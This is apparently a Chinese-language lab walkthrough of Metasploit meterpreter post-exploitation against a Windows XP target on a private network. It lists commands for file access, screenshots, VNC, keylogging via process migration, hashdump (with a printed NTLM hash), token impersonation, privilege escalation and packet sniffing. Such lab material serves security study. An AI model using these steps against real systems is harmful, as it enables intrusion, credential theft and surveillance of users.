环境配置
攻击机:msf5.0(kali 2020.02) IP:192.168.2.104
目标机:Win XP IP:192.168.3.51
使用命令生成一个windows木马image.png
打开msf监听
image.png
将木马发送到靶机上并点击执行
image.png
成功返回meterpreter。

基本命令

help:查看帮助文档信息
background:将当前meterpreter会话挂起
sessions id:切换到编号为id的会话
exit:终止当前会话

文件命令

pwd:查看目标机当前目录
ls:列出当前目标机目录所有文件信息
mv :为目标机上file重命名
rm :删除目标机上的file
cat :查看指定文件内容
del :删除指定文件
edit :编辑指定为文件(类vim操作)
upload (target):上传文件到目标机指定位置上
image.png
download (target) :下载目标机文件到控制机上
search -f :搜索指定文件
image.png

系统命令

sysinfo:显示系统信息
reboot:重启目标机
shutdown:关闭目标机
shell:打开控制台
ps:查看进程列表
reg:与目标机的注册表进行交互
image.png
execute:在目标机上执行指定程序/进程
image.png

网络命令

ipconfig/ifconfig:显示网络信息
netstat:信息端口开放情况
route:显示路由表信息
arp:显示arp缓存表信息
prodfwd:端口转发重定向工具
image.png
利用:https://www.fujieace.com/metasploit/portfwd.html

其他利用

实时截屏
screenshot
image.png
实时窥屏
screenshare
image.png
image.png
run vnc
image.png
此命令的功能为远程操作桌面,然而打开的桌面是锁定,需要运行脚本进行解锁
image.png
然而解锁始终失败

获取键盘记录
执行ps 命令,获得explorer.exe在内的进程列表并查看explorer.exe的编号pid,使用migrate将会话迁移至explorer.exe的进程空间中,之后使用run命令运行keylog_recorder模块,开始记录
image.png

  1. ps | grep "explorer"
  2. migrate 388
  3. run post/windows/capture/keylog_recorder

在目标机进行键入操作,打开另一个终端,查看记录文件
image.png
获取密码哈希值
使用hashdump命令
image.png
成功获取到了Administrator的UID——500,LM哈希值以及NTLM哈希值
500:6349379eb8deaa05aad3b435b51404ee:11398d271cff9472ed4b45a5d3cc5735:::
假冒令牌
use incognito:加载模块
list_tokens -u:列出目标主机用户的可用令牌
list_tokens -g:列出目标主机用户组的可用令牌
impersonate_token 令牌:假冒令牌
image.png
image.png
权限提升
getsystem:提升到系统权限
rev2self:返回初始权限
image.png
调用脚本
迁移进程
image.png
获取信息
run post/windows/gather/checkvm:判断是否为虚拟机
run post/windows/gather/enum_applications:获取安装软件信息
run post/windows/gather/dumplinks:获取最近的文件操作
run scraper:获取系统基本信息
image.png
保存在~/.msf4/logs/scripts/scraper/下
image.png
image.png
网络嗅探
use sniffer
sniffer_interfaces
sniffer_start id
sniffer_dump id filename(如 1 /tmp/1.cap)
image.png
使用wireshark打开1.cap
image.png